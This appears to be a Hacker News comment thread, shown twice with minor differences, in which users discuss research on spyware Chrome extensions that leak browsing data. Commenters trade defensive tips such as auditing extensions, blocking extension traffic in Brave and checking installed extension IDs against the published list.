Over 15 years ago now, I had a popular chrome extension that did a very specific thing. I sold it for a few thousand bucks and moved on. It seemed a bit strange at the time, and I was very cautious in the sale, but sold it and moved on.
It's abundantly obvious to me now that bad actors are purchasing legitimate chrome extensions to add this functionality and earn money off the user's data (or even worse). I have seen multiple reports of this pattern.
show comments
gnl
Couple of quick thoughts on how to protect yourself from having a formerly trustworthy extension go rogue on you:
And then you can do whatever you feel is an appropriate amount of research whenever a particularly privileged extension gets updated (check for transfer of ownership, etc.)
- brave://flags/#brave-extension-network-blocking
You can then create custom rules to filter extension traffic under brave://settings/shields/filters
e.g.:
! Obsidian Web
*$domain=edoacekkjanmingkbkgjndndibhkegad
@@||127.0.0.1^$domain=edoacekkjanmingkbkgjndndibhkegad
- Clone the GitHub repo, do a security audit with Claude Code, build from source, update manually
singularfutur
This is why I only run open source extensions that I can actually audit. uBlock Origin, SponsorBlock, the kind of tools where the code is available and the developer isn't anonymous. The Chrome Web Store is basically unregulated and Google doesn't care as long as they get their cut. Open source at least gives you a chance to see what you're installing before it starts exfiltrating your data to some server in a country you've never heard of.
show comments
kwar13
The code is usually minified and heavily obfuscated but you CAN view the source code for any extension:
My daughter, in grade school, uses a Chromebook at school and access Google Classroom through Chrome. The school has very few restrictions on extensions and when I log into her account, Chrome is littered with extensions. They all innocuous (ex. change cursor into cat, pets play around on your screen etc). However, without fail, each time I log in and go to the extension page, Chrome notifies me that one or more of the extensions was removed due to malicious activity or whatever.
show comments
ravenstine
This is why I disable automatic updates. Not just for browser extensions but everything. This whole "you gotta update immediately or you're gonna get hacked" thing is a charade. If anything, if you update you'll be hacked at this point.
show comments
matheusmoreira
And the ones that are not will probably get bought out at some point and become malware as well.
The only extension I trust enough to install on any browser is uBlock Origin.
show comments
l72
The fact that most of these are capturing query parameters:
"u": "https://www.google.com/search?q=target",
indicates that are capturing tons of authentication tokens. So this goes way beyond just spying on your browser history.
show comments
revicon
If you're on a mac, you can list all the IDs of your installed browser extensions across all your profiles like this...
find "$HOME/Library/Application Support/Google/Chrome" \
-type d -path "*/Extensions/*" -not -path "*/Extensions/*/*" \
-print 2>/dev/null | sed 's#.*/Extensions/##' | sort -u
Compare to the list of bad extensions. I stuck a stripped down list here...
And why didn't one of the wealthiest companies of the world capture this themselves?
Considering the barriers they build to prevent adblockers, that doesn't shine a good light on them.
show comments
nipperkinfeet
Stylus is a good alternative to Stylish. I keep my extensions to a minimum, and I turn off the ones I don't need until I need to use them. The only extensions I have turned on all the time are uBlock, Humble New Tab Page, and Stylus.
georgehill
At this point, someone should make a site to check whether installed extensions are malicious or not.
show comments
cebert
Hopefully people will start learning that you want to install as few browser extensions as possible.
1. Go to chrome://extensions and toggle Developer mode on (so IDs are visible)
2. Select all text on the page with your mouse and copy
3. Paste it into the tool
It parses the IDs and warns you if any are among the 287 spyware extensions.
show comments
mentalgear
Browser extensions have much looser security than you would think: any extension, even if it just claims to change a style of a website, can see your input type=password fields - it's ludicrous that access to those does not need its own permission !
show comments
ghtbircshotbe
Capital One just offered me $45 to install a Firefox extension. I declined, though I'm sort of tempted to get paid for getting spied on which I assume is happening anyway. And who knows, maybe I could get a couple more bucks later in the class action.
@qcontinuum1 appreciate this kind of research. saw your other comments and you mentioned that the team's engineering resources are scarce + saw that at the bottom of the github repo that there are links to BTC address.
curious to know:
1- how large your team is? and how long this research took? it is very thorough and knowing such a detail might encourage others to participate in a joint effort in performing this kind of research
2- if this kind of research is your primary focus?
3- if there are other ways that financial support can be provided other than through xrp or btc?
i tried to look up your profiles but wasn't able to find where you were all from, so wishing you well wherever you are in the world. :)
Pacers31Colts18
I think the industry needs to rethink extensions in general. VSCode and browser extensions seem to have very little thorough review or thought into them. A lot of enterprises aren't managing them properly.
show comments
baby
I’ve always thought that it’s crazy how so many extensions can basically read the content of the webpages your browse. I’m wondering if the research should go further: find all extensions that have URLs backed in them or hashes (of domains?) then check what they do when you visit these URLs
show comments
herf
You know, LLMs could do automated code reviews for each update to avoid things like this. It would be much better than unexamined updates.
singularity2001
The whole browser is spying on you, so don't worry about extensions
show comments
the_gipsy
Remember when google removed extension APIs so that things like uBlock origin stopped working in Chrome, in the name of "security"?
Pepperidge farm remembers.
molticrystal
Using the below page you can check your extensions, select all your extensions on chrome://extensions/ (everything on the page, it will filter it out IDs) and it will check if any IDs match.
be scoped, meaning only allowed to read/access when you visit a particular domain whitelist (controlled by the user)?
be forced (by the extension API) to have a clear non-obfuscated feed of whatever they send that the user can log and/or tap onto and watch at any time?
If not, I wouldn't touch them with a 10000ft pole.
show comments
Grom_PE
It seems crazy to me that the offered way to install an extension on Chrome is to click a button on a privileged website,
and then the installed extension autoupdates without an option to turn it off.
I hate the idea of installing stuff without an ability to look at what's inside first, so what I did was patch Chromium binary,
replacing all strings "chromewebstore.google.com" with something else, so I can inject custom JS into that website and turn
"Install" button into "Download CRX" button. After downloading, I can unpack the .crx file and look at the code, then
install via "Load unpacked" and it never updates automatically. This way I'm sure only the code I've looked at gets executed.
hannob
That can't be true, right? I mean, Google broke Adblockers in Chrome to prevent this very issue. And it had absolutely nothing to do with Google's Ad business.
So it's completely impossible that such malicious extensions still exist.
(may contain sarcasm)
captn3m0
If someone would like to replicate, a good approach would be to reduce the cost by removing a full-chromium engine. I doubt these extensions are trying to do environment detection and won’t run under (for eg) JSDOM+Bun with a Chrome API shim.
ArcaneMoose
Extensions have too many security risks for me. At this point I'd rather just vibe code my own extension than trust something with so much access and unpredictable ownership.
hackinthebochs
Load extensions in developer mode so they can't silently install malware on you
nanobuilds
The browsing data itself is only half the problem. Even if you remove the spying extension, the profile it helped build persists and keeps shaping what you see as it gets sold and changes hands.
We focus a lot on blocking data collection and spyware.. but not enough about what happens after the data is already collected/stolen and baked into your algorithmic identity. So much of our data is already out there.
endsandmeans
Most of them jump out as immediately dodgy -- except Stylsh. That is the only one I've ever used on the list but it's been several years.
show comments
nkmnz
Is there a way to use extensions from a private repository only, where I control the code and build pipeline?
bennydog224
It’s obvious CWS has given up on oversight of these extensions. It’s a minefield.
rkagerer
Here are 3 examples identified in their results.
Play Store pages for all 3 list strong assurances about how the developer declares no data is being sold to third parties, or collected unrelated to the item's core functionality.
My open question to Google is: What consequences will these developers face for lying to you and your users, and why should I have any faith at all in those declarations?
lapcat
> We built an automated scanning pipeline that runs Chrome inside a Docker container, routes all traffic through a man‑in‑the‑middle (MITM) proxy, and watches for outbound requests that correlate with the length of the URLs we feed it.
The biggest problem here is that "We" does not refer to Google itself, who are supposed to be policing their own Chrome Web Store. One of the most profitable corporations in world history is totally negligent.
show comments
neya
Nobody is going to even do anything about SimilarWeb for pulling this off?
My understanding from the article is that they're actively behind this.
When I was the CTO in a previous role, SimilarWeb approached us. I read through the code snippet they gave us to inject onto our site. It was a sophisticated piece of borderline spyware that didn't care about anyone in the entire line of sight - including us. They not only were very persistent, they also had a fight with our management - for refusing to use their snippet. They wanted our data so bad (we had very high traffic at the time). All we wanted was decent analytics for reporting to senior management and Google had just fucked up with their GA4 migration practices. I switched them to Plausible.io and never looked back. It was the least I could do, we had to trade-off so many data points in comparison to GA, but still works flawlessly till date. Fuck SimilarWeb.
bittercucumber
Only 37M? I'd have guessed a higher number than that.
show comments
ubermonkey
I legit do not understand the Chrome hegemony.
PlatoIsADisease
My initial solution was:
>Before installing, make each user click a checkbox what access the extension has
However, as I've seen on android, updates do happen, and you are not asked if new permissions are granted. (Maybe they do ask, but this is after an update automatically is taken place, new code is installed)
Here are the two solutions I have, neither are perfect:
>Do not let updates automatically happen for security reasons. This prevents a change in an App becoming malware, but leaves the app open to Pegasus-like exploits.
>Let updates automatically happen, but leaves you open to remote, unapproved installs.
kgwxd
Yo dawg...
show comments
croes
Just create an AI service and users will voluntarily send you all their data.
No need for such complicated attacks /s
nekusar
Yes, and?
Chrome/Google/Alphabet is spying on 100% of their users.
Quit using Alphabet stuff, and your exploitation factor goes down a LOT.
PurpleRamen
I don't really understand the complaint here. It seems for most of those extensions have it in their literal purpose to send the active URL and get additional information back, for doing something locally with it.
And why does this site has no scrollbar?? WTF, is Webdsign finally that broken?
Over 15 years ago now, I had a popular chrome extension that did a very specific thing. I sold it for a few thousand bucks and moved on. It seemed a bit strange at the time, and I was very cautious in the sale, but sold it and moved on.
It's abundantly obvious to me now that bad actors are purchasing legitimate chrome extensions to add this functionality and earn money off the user's data (or even worse). I have seen multiple reports of this pattern.
Couple of quick thoughts on how to protect yourself from having a formerly trustworthy extension go rogue on you:
- https://github.com/beaufortfrancois/extensions-update-notifi...
And then you can do whatever you feel is an appropriate amount of research whenever a particularly privileged extension gets updated (check for transfer of ownership, etc.)
- brave://flags/#brave-extension-network-blocking
You can then create custom rules to filter extension traffic under brave://settings/shields/filters
e.g.:
- Clone the GitHub repo, do a security audit with Claude Code, build from source, update manuallyThis is why I only run open source extensions that I can actually audit. uBlock Origin, SponsorBlock, the kind of tools where the code is available and the developer isn't anonymous. The Chrome Web Store is basically unregulated and Google doesn't care as long as they get their cut. Open source at least gives you a chance to see what you're installing before it starts exfiltrating your data to some server in a country you've never heard of.
The code is usually minified and heavily obfuscated but you CAN view the source code for any extension:
https://kaveh.page/snippets/chrome-extensions-source-code
Even a tiny extension like this one I wrote with 2k users gets buyout offers all the time to turn it into malware: https://chromewebstore.google.com/detail/one-click-image-sav...
My daughter, in grade school, uses a Chromebook at school and access Google Classroom through Chrome. The school has very few restrictions on extensions and when I log into her account, Chrome is littered with extensions. They all innocuous (ex. change cursor into cat, pets play around on your screen etc). However, without fail, each time I log in and go to the extension page, Chrome notifies me that one or more of the extensions was removed due to malicious activity or whatever.
This is why I disable automatic updates. Not just for browser extensions but everything. This whole "you gotta update immediately or you're gonna get hacked" thing is a charade. If anything, if you update you'll be hacked at this point.
And the ones that are not will probably get bought out at some point and become malware as well.
The only extension I trust enough to install on any browser is uBlock Origin.
The fact that most of these are capturing query parameters:
indicates that are capturing tons of authentication tokens. So this goes way beyond just spying on your browser history.If you're on a mac, you can list all the IDs of your installed browser extensions across all your profiles like this...
Compare to the list of bad extensions. I stuck a stripped down list here...And why didn't one of the wealthiest companies of the world capture this themselves?
Considering the barriers they build to prevent adblockers, that doesn't shine a good light on them.
Stylus is a good alternative to Stylish. I keep my extensions to a minimum, and I turn off the ones I don't need until I need to use them. The only extensions I have turned on all the time are uBlock, Humble New Tab Page, and Stylus.
At this point, someone should make a site to check whether installed extensions are malicious or not.
Hopefully people will start learning that you want to install as few browser extensions as possible.
Made a quick tool so you can check if your extensions are on the list: https://extensioncheck.val.run
1. Go to chrome://extensions and toggle Developer mode on (so IDs are visible)
2. Select all text on the page with your mouse and copy
3. Paste it into the tool
It parses the IDs and warns you if any are among the 287 spyware extensions.
Browser extensions have much looser security than you would think: any extension, even if it just claims to change a style of a website, can see your input type=password fields - it's ludicrous that access to those does not need its own permission !
Capital One just offered me $45 to install a Firefox extension. I declined, though I'm sort of tempted to get paid for getting spied on which I assume is happening anyway. And who knows, maybe I could get a couple more bucks later in the class action.
https://addons.mozilla.org/en-US/firefox/addon/wikibuy-for-f...
@qcontinuum1 appreciate this kind of research. saw your other comments and you mentioned that the team's engineering resources are scarce + saw that at the bottom of the github repo that there are links to BTC address.
curious to know: 1- how large your team is? and how long this research took? it is very thorough and knowing such a detail might encourage others to participate in a joint effort in performing this kind of research 2- if this kind of research is your primary focus? 3- if there are other ways that financial support can be provided other than through xrp or btc?
i tried to look up your profiles but wasn't able to find where you were all from, so wishing you well wherever you are in the world. :)
I think the industry needs to rethink extensions in general. VSCode and browser extensions seem to have very little thorough review or thought into them. A lot of enterprises aren't managing them properly.
I’ve always thought that it’s crazy how so many extensions can basically read the content of the webpages your browse. I’m wondering if the research should go further: find all extensions that have URLs backed in them or hashes (of domains?) then check what they do when you visit these URLs
You know, LLMs could do automated code reviews for each update to avoid things like this. It would be much better than unexamined updates.
The whole browser is spying on you, so don't worry about extensions
Remember when google removed extension APIs so that things like uBlock origin stopped working in Chrome, in the name of "security"?
Pepperidge farm remembers.
Using the below page you can check your extensions, select all your extensions on chrome://extensions/ (everything on the page, it will filter it out IDs) and it will check if any IDs match.
https://output.jsbin.com/gihukasezo/
or
https://jsfiddle.net/9kLsv3xm/latest/
or
https://pastebin.com/Sa8RmzcE
Can extensions:
be scoped, meaning only allowed to read/access when you visit a particular domain whitelist (controlled by the user)?
be forced (by the extension API) to have a clear non-obfuscated feed of whatever they send that the user can log and/or tap onto and watch at any time?
If not, I wouldn't touch them with a 10000ft pole.
It seems crazy to me that the offered way to install an extension on Chrome is to click a button on a privileged website, and then the installed extension autoupdates without an option to turn it off.
I hate the idea of installing stuff without an ability to look at what's inside first, so what I did was patch Chromium binary, replacing all strings "chromewebstore.google.com" with something else, so I can inject custom JS into that website and turn "Install" button into "Download CRX" button. After downloading, I can unpack the .crx file and look at the code, then install via "Load unpacked" and it never updates automatically. This way I'm sure only the code I've looked at gets executed.
That can't be true, right? I mean, Google broke Adblockers in Chrome to prevent this very issue. And it had absolutely nothing to do with Google's Ad business.
So it's completely impossible that such malicious extensions still exist.
(may contain sarcasm)
If someone would like to replicate, a good approach would be to reduce the cost by removing a full-chromium engine. I doubt these extensions are trying to do environment detection and won’t run under (for eg) JSDOM+Bun with a Chrome API shim.
Extensions have too many security risks for me. At this point I'd rather just vibe code my own extension than trust something with so much access and unpredictable ownership.
Load extensions in developer mode so they can't silently install malware on you
The browsing data itself is only half the problem. Even if you remove the spying extension, the profile it helped build persists and keeps shaping what you see as it gets sold and changes hands.
We focus a lot on blocking data collection and spyware.. but not enough about what happens after the data is already collected/stolen and baked into your algorithmic identity. So much of our data is already out there.
Most of them jump out as immediately dodgy -- except Stylsh. That is the only one I've ever used on the list but it's been several years.
Is there a way to use extensions from a private repository only, where I control the code and build pipeline?
It’s obvious CWS has given up on oversight of these extensions. It’s a minefield.
Here are 3 examples identified in their results.
Play Store pages for all 3 list strong assurances about how the developer declares no data is being sold to third parties, or collected unrelated to the item's core functionality.
Brave Web browser (runapps.org) https://chromewebstore.google.com/detail/mmfmakmndejojblgcee...
Handbrake Video Converter (runapps.org) https://chromewebstore.google.com/detail/gmdmkobghhnhmipbppl...
JustParty: Watch Netflix with Friends (JustParty.io) https://chromewebstore.google.com/detail/nhhchicejoohhbnhjpa...
My open question to Google is: What consequences will these developers face for lying to you and your users, and why should I have any faith at all in those declarations?
> We built an automated scanning pipeline that runs Chrome inside a Docker container, routes all traffic through a man‑in‑the‑middle (MITM) proxy, and watches for outbound requests that correlate with the length of the URLs we feed it.
The biggest problem here is that "We" does not refer to Google itself, who are supposed to be policing their own Chrome Web Store. One of the most profitable corporations in world history is totally negligent.
Nobody is going to even do anything about SimilarWeb for pulling this off? My understanding from the article is that they're actively behind this.
When I was the CTO in a previous role, SimilarWeb approached us. I read through the code snippet they gave us to inject onto our site. It was a sophisticated piece of borderline spyware that didn't care about anyone in the entire line of sight - including us. They not only were very persistent, they also had a fight with our management - for refusing to use their snippet. They wanted our data so bad (we had very high traffic at the time). All we wanted was decent analytics for reporting to senior management and Google had just fucked up with their GA4 migration practices. I switched them to Plausible.io and never looked back. It was the least I could do, we had to trade-off so many data points in comparison to GA, but still works flawlessly till date. Fuck SimilarWeb.
Only 37M? I'd have guessed a higher number than that.
I legit do not understand the Chrome hegemony.
My initial solution was:
>Before installing, make each user click a checkbox what access the extension has
However, as I've seen on android, updates do happen, and you are not asked if new permissions are granted. (Maybe they do ask, but this is after an update automatically is taken place, new code is installed)
Here are the two solutions I have, neither are perfect:
>Do not let updates automatically happen for security reasons. This prevents a change in an App becoming malware, but leaves the app open to Pegasus-like exploits.
>Let updates automatically happen, but leaves you open to remote, unapproved installs.
Yo dawg...
Just create an AI service and users will voluntarily send you all their data.
No need for such complicated attacks /s
Yes, and?
Chrome/Google/Alphabet is spying on 100% of their users.
Quit using Alphabet stuff, and your exploitation factor goes down a LOT.
I don't really understand the complaint here. It seems for most of those extensions have it in their literal purpose to send the active URL and get additional information back, for doing something locally with it.
And why does this site has no scrollbar?? WTF, is Webdsign finally that broken?